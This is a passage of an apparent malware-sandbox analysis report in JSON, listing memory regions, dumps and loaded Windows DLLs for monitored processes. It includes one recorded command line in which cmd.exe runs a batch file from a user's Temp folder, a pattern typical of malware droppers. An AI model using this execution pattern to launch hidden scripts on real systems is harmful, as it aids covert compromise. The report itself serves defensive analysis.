"ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_1633", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:23.732", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001634-addr_0x0000000000250000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_369", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_1634", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:23.732", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 389120, "start_va": 1955856384, "type": "region", "version": 1 }, "end_va": 1956245503, "entry_point": 1955856384, "filename": "\\Windows\\SysWOW64\\sxs.dll", "id": "region_1635", "name": "sxs.dll", "norm_filename": "c:\\windows\\syswow64\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 1955856384, "timestamp": "00:01:23.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1952710656, "type": "region", "version": 1 }, "end_va": 1952788479, "entry_point": 1952710656, "filename": "\\Windows\\SysWOW64\\dwmapi.dll", "id": "region_1636", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\syswow64\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1952710656, "timestamp": "00:01:23.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2256895, "entry_point": 0, "filename": null, "id": "region_1637", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:23.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2301951, "entry_point": 0, "filename": null, "id": "region_1638", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:01:23.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 40894464, "type": "region", "version": 1 }, "end_va": 45035519, "entry_point": 0, "filename": null, "id": "region_1639", "name": "pagefile_0x0000000002700000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 40894464, "timestamp": "00:01:23.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 45088768, "type": "region", "version": 1 }, "end_va": 54722559, "entry_point": 45088768, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_1640", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 45088768, "timestamp": "00:01:23.774", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001641-addr_0x0000000000370000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_370", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_1641", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:01:23.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1975844864, "type": "region", "version": 1 }, "end_va": 1988730879, "entry_point": 1975844864, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1642", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1975844864, "timestamp": "00:01:25.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963786240, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1643", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:01:25.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1955725312, "type": "region", "version": 1 }, "end_va": 1955839999, "entry_point": 1955725312, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_1644", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1955725312, "timestamp": "00:01:33.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1998848000, "type": "region", "version": 1 }, "end_va": 1998872575, "entry_point": 1998848000, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_1645", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1998848000, "timestamp": "00:01:33.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955688447, "entry_point": 1955659776, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_1646", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:01:33.681", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001647-addr_0x0000000000240000-size_0x0000000000008000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_371", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 32768, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2392063, "entry_point": 0, "filename": null, "id": "region_1647", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:33.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1955528704, "type": "region", "version": 1 }, "end_va": 1955602431, "entry_point": 1955528704, "filename": "\\Windows\\SysWOW64\\dhcpcsvc.dll", "id": "region_1648", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\syswow64\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1955528704, "timestamp": "00:01:33.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1971912704, "type": "region", "version": 1 }, "end_va": 1972129791, "entry_point": 1971912704, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_1649", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1971912704, "timestamp": "00:01:33.684", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001650-addr_0x00000000024d0000-size_0x0000000000070000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_372", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 39059455, "entry_point": 0, "filename": null, "id": "region_1650", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:33.685", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001651-addr_0x0000000002600000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_373", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 39845888, "type": "region", "version": 1 }, "end_va": 40108031, "entry_point": 0, "filename": null, "id": "region_1651", "name": "private_0x0000000002600000", "norm_filename": null, "region_type": "private_memory", "start_va": 39845888, "timestamp": "00:01:33.685", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001652-addr_0x0000000000260000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_374", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_1652", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:01:33.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001653-addr_0x0000000003430000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_375", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 54722560, "type": "region", "version": 1 }, "end_va": 55771135, "entry_point": 0, "filename": null, "id": "region_1653", "name": "private_0x0000000003430000", "norm_filename": null, "region_type": "private_memory", "start_va": 54722560, "timestamp": "00:01:33.690", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001654-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_376", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1654", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:33.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 134217728, "start_va": 55771136, "type": "region", "version": 1 }, "end_va": 189988863, "entry_point": 0, "filename": null, "id": "region_1655", "name": "private_0x0000000003530000", "norm_filename": null, "region_type": "private_memory", "start_va": 55771136, "timestamp": "00:01:33.695", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001656-addr_0x0000000000400000-size_0x000000000001c000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_377", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 114688, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4308991, "entry_point": 0, "filename": null, "id": "region_1656", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:33.709", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1973342207, "entry_point": 1972174848, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_1657", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:01:33.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1963769855, "entry_point": 1963720704, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_1658", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:01:33.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1961558016, "type": "region", "version": 1 }, "end_va": 1961578495, "entry_point": 1961558016, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_1659", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1961558016, "timestamp": "00:01:33.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1967411199, "entry_point": 1966407680, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_1660", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:01:33.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1992556544, "type": "region", "version": 1 }, "end_va": 1993826303, "entry_point": 1992556544, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_1661", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1992556544, "timestamp": "00:01:33.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1961623552, "type": "region", "version": 1 }, "end_va": 1963700223, "entry_point": 1961623552, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_1662", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1961623552, "timestamp": "00:01:33.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1955463168, "type": "region", "version": 1 }, "end_va": 1955495935, "entry_point": 1955463168, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_1663", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1955463168, "timestamp": "00:01:33.765", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001664-addr_0x000000000b530000-size_0x0000000000270000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_378", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2555904, "start_va": 189988864, "type": "region", "version": 1 }, "end_va": 192544767, "entry_point": 0, "filename": null, "id": "region_1664", "name": "private_0x000000000b530000", "norm_filename": null, "region_type": "private_memory", "start_va": 189988864, "timestamp": "00:01:33.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1955332096, "type": "region", "version": 1 }, "end_va": 1955422207, "entry_point": 1955332096, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_1665", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1955332096, "timestamp": "00:01:33.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3063807, "entry_point": 2818048, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1666", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 2818048, "timestamp": "00:01:33.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955069952, "type": "region", "version": 1 }, "end_va": 1955311615, "entry_point": 1955069952, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1671", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955069952, "timestamp": "00:01:33.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2822143, "entry_point": 0, "filename": null, "id": "region_1672", "name": "pagefile_0x00000000002b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2818048, "timestamp": "00:01:33.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39059456, "type": "region", "version": 1 }, "end_va": 39321599, "entry_point": 0, "filename": null, "id": "region_2089", "name": "private_0x0000000002540000", "norm_filename": null, "region_type": "private_memory", "start_va": 39059456, "timestamp": "00:03:34.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 192544768, "type": "region", "version": 1 }, "end_va": 193593343, "entry_point": 0, "filename": null, "id": "region_2090", "name": "private_0x000000000b7a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 192544768, "timestamp": "00:03:34.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2091", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:03:34.780", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"", "filename": "c:\\windows\\syswow64\\cmd.exe", "id": "proc_8", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000008-region_00001673-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_379", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1673", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:33.809", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001674-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_380", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1674", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:33.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1675", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:33.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1676", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:33.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1677", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:33.810", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001678-addr_0x00000000000f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_381", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_1678", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:33.810", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001679-addr_0x0000000000230000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_382", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1679", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:01:33.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1241120768, "type": "region", "version": 1 }, "end_va": 1241432063, "entry_point": 1241120768, "filename": "\\Windows\\SysWOW64\\cmd.exe", "id": "region_1680", "name": "cmd.exe", "norm_filename": "c:\\windows\\syswow64\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1241120768, "timestamp": "00:01:33.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1681", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:33.914", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1682", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:01:33.914", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1683", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:33.914", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001684-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_383", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1684", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:33.914", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001685-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_384", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1685", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:33.915", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001686-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_385", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1686", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:33.915", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1687", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:33.915", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001688-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_386", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1688", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:33.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], 